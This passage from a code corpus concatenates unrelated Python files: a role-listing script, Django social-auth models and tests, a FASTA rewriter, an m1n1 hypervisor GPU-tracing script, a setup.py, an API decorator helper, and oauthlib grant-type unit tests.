    ret = {}
    for uid, person in personcache.items():
        print(person['UID'], " - ", person['NAME'])
        for entry in person['ROLES'].split('|'):
            # print (i[11:38])
            res = re.search("^erglobalid=(.*),(.*)$", entry[:38])
            roleId = res.group(1)
            # Membership test replaces the old `while True`/bare-`except`
            # construct that was only there to skip unknown role ids.
            if roleId in rolecache:
                sammler = rolecache[roleId]
                print(" RoleID: ", roleId, " - ", sammler['NAME'])
                ret[roleId] = {'ROLEID': roleId, 'NAME': sammler['NAME']}
    return ret
###########################################################
## TEST
def parse_csv(filename, fieldnames=None, delimiter=','):
    """Read *filename* into a mapping of column name -> list of cell values."""
    columns = defaultdict(list)
    with open(filename) as infile:
        reader = DictReader(
            infile, fieldnames=fieldnames, delimiter=delimiter
        )
        for row in reader:
            for column, cell in row.items():
                columns[column].append(cell)
    return columns
###########################################################
## MAIN
# Load the roles export (in1.TXT) and the people export (in2.TXT), print
# each person with their resolvable roles, then dump the distinct roles
# that were seen as "id ; name" lines.
roles = read_roles("in1.TXT")
peoples = read_people("in2.TXT")
# print(peoples['suchtext'])
# print(peoples['suchtext']['NAME'])
# print_sammler("in2.TXT")
# print(peoples['suchtext'])
ret = print_all(peoples, roles)
for i in ret:
    print(ret[i]['ROLEID'], ";",ret[i]['NAME'])
# for p in peoples.items():
#     print(p)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# Just a program/module that print hello
# Gleydson Mazioli da Silva <gleydsonmazioli@gmail.com>
def my_func():
    """Print a greeting."""
    # Call form works on both Python 2 and 3; the old `print 'hello'`
    # statement is a SyntaxError on Python 3.
    print('hello')
if __name__ == "__main__":
my_func()
|
nilq/baby-python
|
python
|
"""Django ORM models for Social Auth"""
import six
from django.db import models
from django.conf import settings
from django.db.utils import IntegrityError
from social.utils import setting_name
from social.storage.django_orm import DjangoUserMixin, \
DjangoAssociationMixin, \
DjangoNonceMixin, \
DjangoCodeMixin, \
BaseDjangoStorage
from social.apps.django_app.default.fields import JSONField
from social.apps.django_app.default.managers import UserSocialAuthManager
# Resolve the user model: social-specific setting first, then Django's
# AUTH_USER_MODEL, finally the stock auth.User.
USER_MODEL = getattr(settings, setting_name('USER_MODEL'), None) or \
             getattr(settings, 'AUTH_USER_MODEL', None) or \
             'auth.User'
# Column lengths; each one is overridable through settings (default 255).
UID_LENGTH = getattr(settings, setting_name('UID_LENGTH'), 255)
NONCE_SERVER_URL_LENGTH = getattr(
    settings, setting_name('NONCE_SERVER_URL_LENGTH'), 255)
ASSOCIATION_SERVER_URL_LENGTH = getattr(
    settings, setting_name('ASSOCIATION_SERVER_URL_LENGTH'), 255)
ASSOCIATION_HANDLE_LENGTH = getattr(
    settings, setting_name('ASSOCIATION_HANDLE_LENGTH'), 255)
class AbstractUserSocialAuth(models.Model, DjangoUserMixin):
    """Abstract Social Auth association model.

    Links a local user to one (provider, uid) identity, with arbitrary
    provider data stored in extra_data.
    """
    user = models.ForeignKey(USER_MODEL, related_name='social_auth')
    provider = models.CharField(max_length=32)
    uid = models.CharField(max_length=UID_LENGTH)
    extra_data = JSONField()
    objects = UserSocialAuthManager()

    def __str__(self):
        return str(self.user)

    class Meta:
        abstract = True

    @classmethod
    def get_social_auth(cls, provider, uid):
        """Return the association for (provider, uid), or None when absent."""
        # NOTE(review): queries via cls but catches
        # UserSocialAuth.DoesNotExist — this works only because concrete
        # subclasses share that exception class; confirm if further
        # subclassing is intended.
        try:
            return cls.objects.select_related('user').get(provider=provider,
                                                          uid=uid)
        except UserSocialAuth.DoesNotExist:
            return None

    @classmethod
    def username_max_length(cls):
        """Max length of the username field on the configured user model."""
        username_field = cls.username_field()
        # NOTE(review): hardcodes UserSocialAuth instead of using cls.
        field = UserSocialAuth.user_model()._meta.get_field(username_field)
        return field.max_length

    @classmethod
    def user_model(cls):
        """Return the configured user model class, resolving lazy
        'app_label.ModelName' string references."""
        user_model = UserSocialAuth._meta.get_field('user').rel.to
        if isinstance(user_model, six.string_types):
            app_label, model_name = user_model.split('.')
            return models.get_model(app_label, model_name)
        return user_model
class UserSocialAuth(AbstractUserSocialAuth):
    """Social Auth association model.

    Concrete table; a given (provider, uid) identity maps to at most one
    local user.
    """
    class Meta:
        """Meta data"""
        unique_together = ('provider', 'uid')
        db_table = 'social_auth_usersocialauth'
class Nonce(models.Model, DjangoNonceMixin):
    """One use numbers (OpenID replay protection)."""
    server_url = models.CharField(max_length=NONCE_SERVER_URL_LENGTH)
    timestamp = models.IntegerField()
    salt = models.CharField(max_length=65)

    class Meta:
        # A nonce may be consumed only once per server.
        unique_together = ('server_url', 'timestamp', 'salt')
        db_table = 'social_auth_nonce'
class Association(models.Model, DjangoAssociationMixin):
    """OpenId account association."""
    server_url = models.CharField(max_length=ASSOCIATION_SERVER_URL_LENGTH)
    handle = models.CharField(max_length=ASSOCIATION_HANDLE_LENGTH)
    secret = models.CharField(max_length=255)  # Stored base64 encoded
    # issued/lifetime are Unix-timestamp style integers.
    issued = models.IntegerField()
    lifetime = models.IntegerField()
    assoc_type = models.CharField(max_length=64)

    class Meta:
        db_table = 'social_auth_association'
class Code(models.Model, DjangoCodeMixin):
    """Email-verification code sent during partial sign-up flows."""
    email = models.EmailField(max_length=254)
    code = models.CharField(max_length=32, db_index=True)
    verified = models.BooleanField(default=False)

    class Meta:
        db_table = 'social_auth_code'
        unique_together = ('email', 'code')
class DjangoStorage(BaseDjangoStorage):
    """Bundles the concrete ORM models into the storage interface
    expected by the social auth backends."""
    user = UserSocialAuth
    nonce = Nonce
    association = Association
    code = Code

    @classmethod
    def is_integrity_error(cls, exception):
        # Exact class check (not isinstance) mirrors how the backends
        # distinguish DB uniqueness violations.
        return exception.__class__ is IntegrityError
|
nilq/baby-python
|
python
|
#! python
# A small program to match either a fasta or qual file based on whether the barcode was found or not.
# Need a group file that designates sequences without a recognized barcode as "none".
# To use the program entries should look like the following:
# python matchFastaGroup.py <fastaORqualFile> <groupFilew> <outputfileName.fasta> <thingToAdd>
# Need to add a component that incorporates new mapfile into the workflow
# Load the needed modules for the program
import sys, re
# Read in a Command arguments for files to match
# Input other instructions from here
def commandLine():
    """Return (fastafile, groupfile, outputfile, addition) from sys.argv."""
    _, fastafile, groupfile, outputfile, addition = sys.argv[:5]
    return fastafile, groupfile, outputfile, addition
# Read in data and create dictionary
def makeDataArray(inputfile, type):
    """Read *inputfile* into a dict keyed by record name.

    type selects the parser:
      "fasta"       - two-line records: ">name" header then sequence line
      "group"       - tab separated "name<TAB>group" lines
      anything else - map file with "number<TAB>name" lines
    """
    DataDict = {}
    # `with` guarantees the handle is closed on every branch; the previous
    # version only closed the file for fasta input and leaked it otherwise.
    with open(inputfile, 'r') as handle:
        if type == "fasta":
            print("Reading in Fasta file.....")
            names = []
            sequence = []
            # Odd lines (1st, 3rd, ...) are headers, even lines sequences.
            for x, line in enumerate(handle, start=1):
                if x % 2 != 0:
                    # Drop every '>' and surrounding tabs/newline.
                    newLine = re.sub('>', '', line)
                    names.append(newLine.strip('\t\n'))
                else:
                    sequence.append(line.strip('\n'))
            for i, seqName in enumerate(names):
                DataDict[seqName] = sequence[i]
        elif type == "group":
            print("Reading in group file......")
            for line in handle:
                seqName, group = line.split('\t')
                DataDict[seqName] = group.strip('\n')
        else:
            for line in handle:
                number, seqname = line.split('\t')
                DataDict[number] = seqname.strip('\n')
    return DataDict
def makeNewFasta(fastaDict, addition, outputfile):
    """Write *fastaDict* to *outputfile*, tagging every name with _addition."""
    print("Creating new fasta file......")
    with open(outputfile, 'w') as outfile:
        for name in fastaDict:
            outfile.write(">{0}_{1}\n{2}\n".format(name, addition, fastaDict[name]))
# Make a new group file based on the groups not labelled with "none"
def makeNewGroups(groupDict, addition, outputfile):
    """Write *groupDict* next to *outputfile* under a .groups extension.

    Each line has the form "<name>_<addition><TAB><group>".
    """
    # r'\.fasta' — the previous pattern used an unescaped '.', which
    # matches ANY character, so e.g. "Xfasta" elsewhere in the path would
    # also have been rewritten.
    NewOuputfile = re.sub(r'\.fasta', '.groups', outputfile)
    outfile = open(NewOuputfile, 'w')
    print("Creating new group file.......")
    for i in groupDict:
        group = groupDict[i]
        print("{0}_{1}\t{2}".format(i, addition, group), end ='\n', file = outfile)
    outfile.close()
# Run the actual program
def main():
    """Drive the fasta/group rewriting from the command-line arguments."""
    fastafile, groupfile, outputfile, addition = commandLine()
    fasta_records = makeDataArray(fastafile, "fasta")
    group_records = makeDataArray(groupfile, "group")
    makeNewFasta(fasta_records, addition, outputfile)
    makeNewGroups(group_records, addition, outputfile)
    print("Complete")
if __name__ == '__main__': main()
|
nilq/baby-python
|
python
|
# Read N, then N integer prices.  Everything except the single most
# expensive item costs full price; the most expensive one costs half
# (integer division).
item_count = int(input())
prices = sorted(int(input()) for _ in range(item_count))
print(prices[-1] // 2 + sum(prices[:-1]))
|
nilq/baby-python
|
python
|
import datetime
from django.test import TestCase
from django.db import IntegrityError
from django.contrib.auth.models import User
from django.conf import settings
from rest_framework.authtoken.models import Token
from organizations.models import Organization, Unit
from employees.models import EmployeeGrade, UserData
from hours.models import (
ReportingPeriod,
Timecard,
TimecardObject
)
from projects.models import Project
class EmployeeGradeTests(TestCase):
    """Tests for the EmployeeGrade model."""
    fixtures = ['tock/fixtures/prod_user.json']

    def setUp(self):
        # One grade entry for the fixture user, effective today.
        self.employeegrade = EmployeeGrade.objects.create(
            employee=User.objects.get(pk=1),
            grade=8,
            g_start_date=datetime.date.today()
        )

    def test_unique_with_g_start_date(self):
        """Check that multiple EmployeeGrade objects with the same g_start_date
        cannot be saved for the same employee."""
        with self.assertRaises(IntegrityError):
            EmployeeGrade.objects.create(
                employee=User.objects.get(pk=1),
                grade=9,
                g_start_date=datetime.date.today()
            )

    def test_string_method(self):
        """Check that string method override works correctly."""
        expected_string = '{0} - {1} (Starting: {2})'.format(
            self.employeegrade.employee,
            self.employeegrade.grade,
            self.employeegrade.g_start_date
        )
        self.assertEqual(expected_string, str(self.employeegrade))
class UserDataTests(TestCase):
fixtures = ['projects/fixtures/projects.json']
def setUp(self):
# Create regular_user.
self.regular_user = User.objects.create(
username='brian.whittaker',
is_superuser=True,
is_staff=True,
is_active=True
)
self.inactive_user = User.objects.create(
username='aaron.snow',
is_superuser=True,
is_staff=True,
is_active=False
)
# Create Organization.
self.regular_user_org = Organization.objects.create(
name='18F',
description='18F',
active=True
)
# Create Unit.
self.regular_user_unit = Unit.objects.create(
name='Engineering',
description='18F Engineering Chapter',
org=self.regular_user_org,
active=True
)
# Create UserData object related to regular_user.
self.regular_user_userdata = UserData.objects.create(
user=self.regular_user,
start_date= datetime.date(2014, 1, 1),
end_date=datetime.date(2100, 1, 1),
current_employee=True,
organization=self.regular_user_org,
unit=self.regular_user_unit
)
self.inactive_user_userdata = UserData.objects.create(
user=self.inactive_user,
start_date= datetime.date(2014, 1, 1),
end_date=datetime.date(2100, 1, 1),
current_employee=True,
organization=self.regular_user_org,
unit=self.regular_user_unit
)
# Create a sample reporting period
self.reporting_period = ReportingPeriod.objects.create(
start_date=datetime.date(2015, 1, 1),
end_date=datetime.date(2015, 1, 7),
exact_working_hours=40,
min_working_hours=40,
max_working_hours=60,
message='This is not a vacation'
)
# Create API token for regular_user.
self.token = Token.objects.create(user=self.regular_user)
def test_string_method(self):
"""Check that string method override works correctly."""
userdata = self.regular_user_userdata
expected_string = str(userdata.user.username)
self.assertEqual(expected_string, str(userdata))
def test_user_data_is_stored(self):
""" Check that user data was stored correctly """
userdata = self.regular_user_userdata
self.assertEqual(
userdata.start_date,
datetime.date(2014, 1, 1)
)
self.assertEqual(
userdata.end_date,
datetime.date(2100, 1, 1)
)
self.assertEqual(userdata.unit, self.regular_user_unit)
def test_is_late(self):
""" Check if the user is late when no Timecard is present """
userdata = self.regular_user_userdata
self.assertEqual(userdata.is_late, True)
# Now set to false and re-check:
userdata.billable_expectation = 0
userdata.save()
self.assertEqual(userdata.is_late, False)
def test_is_active(self):
userdata = self.regular_user_userdata
self.assertEqual(userdata.is_active, True)
userdata = self.inactive_user_userdata
self.assertEqual(userdata.is_active, False)
def test_organization_name(self):
"""
Check to see if we can get organization name and unit correctly.
And that the organization_name shortcut matches
the name from the relationship.
"""
userdata = self.regular_user_userdata
self.assertEqual(userdata.organization.name, '18F')
self.assertEqual(userdata.unit.name, 'Engineering')
def test_organization_name_empty(self):
""" Check to see if we can get empty organization name"""
# Create regular_user.
user1 = User.objects.create(
username='john.doe',
is_superuser=True,
is_staff=True,
is_active=True
)
# Create UserData object related to regular_user.
userdata1 = UserData.objects.create(
user=user1,
start_date= datetime.date(2014, 1, 1),
end_date=datetime.date(2100, 1, 1),
unit=self.regular_user_unit,
current_employee=True
)
self.assertEqual(userdata1.organization_name, '')
def test_is_not_late(self):
""" Check if the user is not late when Timecard is present """
userdata = self.regular_user_userdata
timecard = Timecard.objects.create(
user=self.regular_user,
reporting_period=self.reporting_period,
submitted=True
)
project = Project.objects.get(name="Platform as a Service")
TimecardObject.objects.create(
timecard=timecard,
project=project,
hours_spent=40)
self.assertEqual(userdata.is_late, False)
def test_employee_active(self):
""" Check that the save() method correctly aligns UserData and User
attributes when current_employee is True."""
user = self.regular_user
user.is_active = False
user.save()
status_before_save = user.is_active
self.regular_user_userdata.current_employee = True
self.regular_user_userdata.save()
# now re-get the user object so we can see if the status
# changed when userdata changed.
status_after_save = User.objects.get(
username=self.regular_user.username).is_active
self.assertNotEqual(status_before_save, status_after_save)
    def test_token_is_delete_on_active_is_false(self):
        """ Verify that any tokens associated with a user are deleted when that
        user is marked as not active. """
        token_before_save = self.token
        # NOTE(review): this grabs an arbitrary UserData row rather than
        # self.regular_user_userdata; presumably the fixtures guarantee the
        # first row belongs to regular_user — confirm.
        userdata = UserData.objects.first()
        userdata.current_employee = False
        userdata.save()
        # The save() should have cascaded a delete of the user's API token.
        try:
            token_after_save = Token.objects.get(user=self.regular_user)
        except Token.DoesNotExist:
            token_after_save = None
        self.assertNotEqual(token_before_save, token_after_save)
def test_is_18f_employee_false_if_no_org(self):
"""False if no org or not named 18F"""
self.regular_user_userdata.organization = None
self.regular_user_userdata.save()
self.assertFalse(self.regular_user_userdata.is_18f_employee)
    def test_is_18f_employee_false_if_not_18f(self):
        """False if org not named 18F"""
        # Give the user a real organization whose name is not '18F'.
        not_18f = Organization.objects.create(
            name='not_18f',
            description='not_18f',
            active=True
        )
        self.regular_user_userdata.organization = not_18f
        self.regular_user_userdata.save()
        self.assertFalse(self.regular_user_userdata.is_18f_employee)
    def test_is_18f_employee_true_if_18f(self):
        """True if the user's organization is named 18F."""
        # Org for `UserData` here defined in UserDataTests.setUp
        self.assertTrue(self.regular_user_userdata.is_18f_employee)
def test_billable_expectation(self):
self.regular_user_userdata.expected_billable_hours = 30
expected = 30 / settings.HOURS_IN_A_REGULAR_WORK_WEEK
self.assertEqual(self.regular_user_userdata.billable_expectation, expected)
def test_display_name_if_no_full_name(self):
expected = self.regular_user.username
self.assertEqual(self.regular_user_userdata.display_name, expected)
def test_display_name_if_full_name(self):
self.regular_user.first_name = 'Hank'
self.regular_user.last_name = 'Venture'
expected = self.regular_user.get_full_name()
self.assertEqual(self.regular_user_userdata.display_name, expected)
|
nilq/baby-python
|
python
|
# SPDX-License-Identifier: MIT
# m1n1 hypervisor shell script: set up AGX GPU firmware tracing.
# NOTE(review): `hv` and `trace_device` are presumably injected into the
# namespace by the m1n1 hypervisor shell (plus the star import below).
import datetime
from m1n1.constructutils import show_struct_trace
from m1n1.utils import *
# Disable the generic MMIO tracers for the GPU-related devices so the
# dedicated AGXTracer below is the only thing watching them.
trace_device("/arm-io/sgx", False)
trace_device("/arm-io/pmp", False)
trace_device("/arm-io/gfx-asc", False)
from m1n1.trace.agx import AGXTracer
# _reloadcls(True) re-imports the tracer class so live edits are picked up.
AGXTracer = AGXTracer._reloadcls(True)
agx_tracer = AGXTracer(hv, "/arm-io/gfx-asc", verbose=1)
agx_tracer.start()
def resume_tracing(ctx):
    """Hypercall handler: open a fresh timestamped log under gfxlogs/ and
    resume the AGX tracer. Returns True to acknowledge the hypercall."""
    fname = f"{datetime.datetime.now().isoformat()}.log"
    hv.set_logfile(open(f"gfxlogs/{fname}", "a"))
    agx_tracer.resume()
    return True
def pause_tracing(ctx):
    """Hypercall handler: pause the AGX tracer and detach the log file.
    Returns True to acknowledge the hypercall."""
    agx_tracer.pause()
    hv.set_logfile(None)
    return True
# Expose pause/resume as guest hypercalls so tracing can be toggled at runtime.
hv.add_hvcall(100, resume_tracing)
hv.add_hvcall(101, pause_tracing)
# Leave the large GPU memory regions untraced by default; flip to SYNC to
# watch them.
mode = TraceMode.OFF
trace_range(irange(agx_tracer.gpu_region, agx_tracer.gpu_region_size), mode=mode, name="gpu_region")
trace_range(irange(agx_tracer.gfx_shared_region, agx_tracer.gfx_shared_region_size), mode=mode, name="gfx_shared_region")
trace_range(irange(agx_tracer.gfx_handoff, agx_tracer.gfx_handoff_size), mode=mode, name="gfx_handoff")
## Trace the entire mmio range around the GPU
node = hv.adt["/arm-io/sgx"]
addr, size = node.get_reg(0)
#hv.trace_range(irange(addr, 0x1000000), TraceMode.SYNC, name="sgx")
hv.trace_range(irange(addr, 0x1000000), TraceMode.OFF, name="sgx")
# Always watch the GPU fault code register synchronously.
hv.trace_range(irange(0x204017030, 8), TraceMode.SYNC, name="faultcode")
def trace_all_gfx_io():
    """SYNC-trace every physical IO range mapped into the GPU's UAT IOMMU
    pagetable, so CPU-side accesses to them show up in the trace log.

    Each `page (N)` comment records the UAT mapping (VA ... -> PA [PTE]) the
    range below it was derived from.
    """
    # These are all the IO ranges that get mapped into the UAT iommu pagetable
    # Trace them so we can see if any of them are being written by the CPU
    # page (8): fa010020000 ... fa010023fff -> 000000020e100000 [8000020e100447]
    hv.trace_range(irange(0x20e100000, 0x4000), mode=TraceMode.SYNC)
    # page (10): fa010028000 ... fa01002bfff -> 000000028e104000 [c000028e104447]
    # BUG FIX: this line traced 0x20e100000 (a duplicate of page 8) instead of
    # the 0x28e104000 address its own mapping comment records.
    hv.trace_range(irange(0x28e104000, 0x4000), mode=TraceMode.SYNC)
    # page (22): fa010058000 ... fa01005bfff -> 000000028e494000 [8000028e494447]
    hv.trace_range(irange(0x28e494000, 0x4000), mode=TraceMode.SYNC)
    # page (28): fa010070000 ... fa010073fff -> 0000000204d60000 [c0000204d60447]
    hv.trace_range(irange(0x204d60000, 0x4000), mode=TraceMode.SYNC)
    # page (30): fa010078000 ... fa01007bfff -> 0000000200000000 [c0000200000447]
    # to
    # page (83): fa01014c000 ... fa01014ffff -> 00000002000d4000 [c00002000d4447]
    hv.trace_range(irange(0x200000000, 0xd5000), mode=TraceMode.SYNC)
    # page (84): fa010150000 ... fa010153fff -> 0000000201000000 [c0000201000447]
    # page (137): fa010224000 ... fa010227fff -> 00000002010d4000 [c00002010d4447]
    hv.trace_range(irange(0x201000000, 0xd5000), mode=TraceMode.SYNC)
    # page (138): fa010228000 ... fa01022bfff -> 0000000202000000 [c0000202000447]
    # page (191): fa0102fc000 ... fa0102fffff -> 00000002020d4000 [c00002020d4447]
    hv.trace_range(irange(0x202000000, 0xd5000), mode=TraceMode.SYNC)
    # page (192): fa010300000 ... fa010303fff -> 0000000203000000 [c0000203000447]
    hv.trace_range(irange(0x203000000, 0xd5000), mode=TraceMode.SYNC)
    hv.trace_range(irange(0x204000000, 0xd5000), mode=TraceMode.SYNC)
    hv.trace_range(irange(0x205000000, 0xd5000), mode=TraceMode.SYNC)
    hv.trace_range(irange(0x206000000, 0xd5000), mode=TraceMode.SYNC)
    hv.trace_range(irange(0x207000000, 0xd5000), mode=TraceMode.SYNC)
    # page (464): fa010740000 ... fa010743fff -> 00000002643c4000 [c00002643c4447]
    hv.trace_range(irange(0x2643c4000, 0x4000), mode=TraceMode.SYNC)
    # page (466): fa010748000 ... fa01074bfff -> 000000028e3d0000 [c000028e3d0447]
    hv.trace_range(irange(0x28e3d0000, 0x4000), mode=TraceMode.SYNC)
    # page (468): fa010750000 ... fa010753fff -> 000000028e3c0000 [8000028e3c0447]
    hv.trace_range(irange(0x28e3c0000, 0x4000), mode=TraceMode.SYNC)
    # page (8): f9100020000 ... f9100023fff -> 0000000406000000 [60000406000447]
    # page (263): f910041c000 ... f910041ffff -> 00000004063fc000 [600004063fc447]
    # NOTE(review): the base here (0x2643c4000) does not match the 0x406000000
    # mapping recorded above — looks suspicious, but left unchanged pending
    # confirmation of the intended range.
    hv.trace_range(irange(0x2643c4000, 0x63fc000), mode=TraceMode.SYNC)
def trace_gpu_irqs():
    """Enable IRQ tracing for every interrupt of the SGX and gfx-asc nodes."""
    for path in ("/arm-io/sgx", "/arm-io/gfx-asc"):
        node = hv.adt[path]
        for irq in node.interrupts:
            hv.trace_irq(f"{node.name} {irq}", irq, 1, hv.IRQTRACE_IRQ)
|
nilq/baby-python
|
python
|
import setuptools
# Distribution metadata for the livemelee package: a convenience layer for
# building SSBM bots on top of the libmelee dependency declared below.
setuptools.setup(
    name="livemelee",
    version="0.3.0",
    author="Justin Wong",
    author_email="jkwongfl@yahoo.com",
    description="An easier way to develop a SSBM bot. Built off libmelee.",
    # NOTE(review): the README handle is never closed; harmless in a one-shot
    # setup script, but a context manager would be tidier.
    long_description=open('README.md', 'r').read(),
    long_description_content_type="text/markdown",
    url="https://github.com/wong-justin/melee-bot",
    packages=setuptools.find_packages(),
    install_requires=[
        'melee',
    ],
    python_requires='>=3.7',
    keywords=['melee', 'smash bros', 'slippi'],
    # for documentation.md:
    # setup_requires=['setuptools_git', 'setuptools_scm'],
    package_data={'': ['documentation.md']},
    include_package_data=True,
)
|
nilq/baby-python
|
python
|
from lxml import etree
from ..https import Methods
from ..objects.base import remove_xmlns
class Request(object):
    """A prepared API request plus the callback that maps its raw response.

    `map_method` is applied to the response content by `map()`; the client is
    expected to call it after performing the HTTP exchange.
    """
    def __init__(self, path, headers, params, map_method, data=None, method=None):
        self.map_method = map_method
        self.method = method
        self.data = data
        self.params = params
        self.headers = headers
        self.path = path

    def map(self, content):
        """Run the stored mapping callback over raw response content."""
        return self.map_method(content)
class BaseApi(object):
    """Base class for API endpoint groups: wraps a client plus xpath helpers."""

    def __init__(self, client):
        self.client = client

    def make_ns(self, ns):
        """Wrap a namespace URI in the 'cp' prefix mapping used by xpath."""
        return {"cp": ns}

    def val(self, data, xpath, ns):
        """Text of the first node matching *xpath* (IndexError if none)."""
        return self.elems(data, xpath, ns)[0].text

    def elems(self, data, xpath, ns):
        """All nodes under *data* matching *xpath* with namespaces *ns*."""
        return data.xpath(xpath, namespaces=ns)

    def parse_xml(self, data):
        """Parse raw XML and strip namespace prefixes from the tree."""
        node = etree.fromstring(data)
        remove_xmlns(node)
        return node
def make_ns(namespace):
    """Map *namespace* onto the conventional 'cp' xpath prefix."""
    return {'cp': namespace}
def method(
    path=None,
    content_type=None,
    xmlns=None,
    method=Methods.GET,
    headers=None,
    **kw
):
    """Decorator factory turning an API-class method into an HTTP call.

    The decorated function becomes the response mapper: it receives the raw
    response content (plus any extra **kw, e.g. the xml namespace under 'ns')
    and returns the parsed result. The generated wrapper builds a Request and
    hands it to self.client.send_request().
    """
    # headers/kw are captured once at decoration time and shared by every
    # call of the decorated method; they are only mutated here, not per call.
    if headers is None:
        headers = {}
    if content_type:
        headers['Content-Type'] = content_type
        headers['Accept'] = content_type
    if xmlns:
        namespace = make_ns(xmlns)
        kw['ns'] = namespace
    else:
        namespace = None
    def wrap(func):
        def _inner(self, data=None, params=None, **kwargs):
            """
            The actual method being called when wrapping the methods of
            the class.
            Attributes:
                self (Api): The API class being passed
                obj (string): xml data being passed for post requests
                params (dict): key/value container for GET params
            """
            # Copy the caller's params so merging in **kwargs never mutates
            # the caller's dict.
            if params is None:
                params = {}
            else:
                params = params.copy()
            params.update(kwargs)
            def handle_result_proxy(content):
                # kw.copy() keeps the shared decoration-time kwargs safe from
                # mutation by the mapped function.
                return func(self, content, **kw.copy())
            request = Request(
                path=path,
                headers=headers,
                data=data,
                params=params,
                method=method,
                map_method=handle_result_proxy
            )
            # Pass the request to the client and return the response
            return self.client.send_request(request)
        return _inner
    return wrap
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from ...unittest import TestCase
import json
import mock
from oauthlib import common
from oauthlib.common import Request
from oauthlib.oauth2.rfc6749.errors import UnsupportedGrantTypeError
from oauthlib.oauth2.rfc6749.errors import InvalidRequestError
from oauthlib.oauth2.rfc6749.errors import InvalidClientError
from oauthlib.oauth2.rfc6749.errors import InvalidGrantError
from oauthlib.oauth2.rfc6749.grant_types import AuthorizationCodeGrant
from oauthlib.oauth2.rfc6749.grant_types import ImplicitGrant
from oauthlib.oauth2.rfc6749.grant_types import ResourceOwnerPasswordCredentialsGrant
from oauthlib.oauth2.rfc6749.grant_types import ClientCredentialsGrant
from oauthlib.oauth2.rfc6749.grant_types import RefreshTokenGrant
from oauthlib.oauth2.rfc6749.tokens import BearerToken
class RequestValidatorTest(TestCase):
    """Placeholder suite for request-validator behaviour; bodies not yet
    written (each case is a TODO)."""
    def test_client_id(self):
        # TODO: implement
        pass
    def test_client(self):
        # TODO: implement
        pass
    def test_response_type(self):
        # TODO: implement
        pass
    def test_scopes(self):
        # TODO: implement
        pass
    def test_redirect_uri(self):
        # TODO: implement
        pass
class AuthorizationCodeGrantTest(TestCase):
    """Tests for the RFC 6749 authorization-code grant."""
    def setUp(self):
        # A fully-populated token request, plus a second request that only
        # carries a `state` value (to check state echoing).
        self.request = Request('http://a.b/path')
        self.request.scopes = ('hello', 'world')
        self.request.expires_in = 1800
        self.request.client = 'batman'
        self.request.client_id = 'abcdef'
        self.request.code = '1234'
        self.request.response_type = 'code'
        self.request.grant_type = 'authorization_code'
        self.request_state = Request('http://a.b/path')
        self.request_state.state = 'abc'
        self.mock_validator = mock.MagicMock()
        # authenticate_client must attach a client to the request as a side
        # effect; set_client below emulates that.
        self.mock_validator.authenticate_client.side_effect = self.set_client
        self.auth = AuthorizationCodeGrant(request_validator=self.mock_validator)
    def set_client(self, request):
        """Stand-in for authenticate_client: attach a mock client, succeed."""
        request.client = mock.MagicMock()
        request.client.client_id = 'mocked'
        return True
    def test_create_authorization_grant(self):
        """An authorization code is issued; `state` is echoed when present."""
        grant = self.auth.create_authorization_code(self.request)
        self.assertIn('code', grant)
        grant = self.auth.create_authorization_code(self.request_state)
        self.assertIn('code', grant)
        self.assertIn('state', grant)
    def test_create_token_response(self):
        """The token response carries the standard bearer-token fields."""
        bearer = BearerToken(self.mock_validator)
        u, h, token, s = self.auth.create_token_response(self.request, bearer)
        token = json.loads(token)
        self.assertIn('access_token', token)
        self.assertIn('refresh_token', token)
        self.assertIn('expires_in', token)
        self.assertIn('scope', token)
    def test_validate_token_request(self):
        """Each validation failure raises its specific error type."""
        mock_validator = mock.MagicMock()
        auth = AuthorizationCodeGrant(request_validator=mock_validator)
        request = Request('http://a.b/path')
        # No grant_type at all.
        self.assertRaises(UnsupportedGrantTypeError,
                auth.validate_token_request, request)
        request.grant_type = 'authorization_code'
        # Correct grant type but still no code.
        self.assertRaises(InvalidRequestError,
                auth.validate_token_request, request)
        # Code present but client authentication fails both ways.
        mock_validator.authenticate_client.return_value = False
        mock_validator.authenticate_client_id.return_value = False
        request.code = 'waffles'
        self.assertRaises(InvalidClientError,
                auth.validate_token_request, request)
        # Client OK, but the authorization code itself is rejected.
        request.client = 'batman'
        mock_validator.authenticate_client = self.set_client
        mock_validator.validate_code.return_value = False
        self.assertRaises(InvalidGrantError,
                auth.validate_token_request, request)
class ImplicitGrantTest(TestCase):
    """Tests for the RFC 6749 implicit grant."""
    def setUp(self):
        mock_client = mock.MagicMock()
        mock_client.user.return_value = 'mocked user'
        self.request = Request('http://a.b/path')
        self.request.scopes = ('hello', 'world')
        self.request.client = mock_client
        self.request.client_id = 'abcdef'
        self.request.response_type = 'token'
        self.request.state = 'xyz'
        self.request.redirect_uri = 'https://b.c/p'
        self.mock_validator = mock.MagicMock()
        self.auth = ImplicitGrant(request_validator=self.mock_validator)
    def test_create_token_response(self):
        """The token is delivered in the redirect URI fragment."""
        bearer = BearerToken(self.mock_validator, expires_in=1800)
        # Pin the generated token to '1234' so the expected URI is exact;
        # addCleanup restores the real generator afterwards.
        orig_generate_token = common.generate_token
        self.addCleanup(setattr, common, 'generate_token', orig_generate_token)
        common.generate_token = lambda *args, **kwargs: '1234'
        uri, headers, body, status_code = self.auth.create_token_response(
            self.request, bearer)
        correct_uri = 'https://b.c/p#access_token=1234&token_type=Bearer&expires_in=1800&state=xyz&scope=hello+world'
        self.assertURLEqual(uri, correct_uri, parse_fragment=True)
    def test_error_response(self):
        # TODO: implement
        pass
class ResourceOwnerPasswordCredentialsGrantTest(TestCase):
    """Tests for the RFC 6749 resource-owner password credentials grant."""
    def setUp(self):
        mock_client = mock.MagicMock()
        mock_client.user.return_value = 'mocked user'
        self.request = Request('http://a.b/path')
        self.request.grant_type = 'password'
        self.request.username = 'john'
        self.request.password = 'doe'
        self.request.client = mock_client
        self.request.scopes = ('mocked', 'scopes')
        self.mock_validator = mock.MagicMock()
        self.auth = ResourceOwnerPasswordCredentialsGrant(
                request_validator=self.mock_validator)
    def test_create_token_response(self):
        """Token response includes access, refresh, type and expiry fields."""
        bearer = BearerToken(self.mock_validator)
        uri, headers, body, status_code = self.auth.create_token_response(
                self.request, bearer)
        token = json.loads(body)
        self.assertIn('access_token', token)
        self.assertIn('token_type', token)
        self.assertIn('expires_in', token)
        self.assertIn('refresh_token', token)
    def test_error_response(self):
        # TODO: implement
        pass
    def test_scopes(self):
        # TODO: implement
        pass
class ClientCredentialsGrantTest(TestCase):
    """Tests for the RFC 6749 client-credentials grant."""
    def setUp(self):
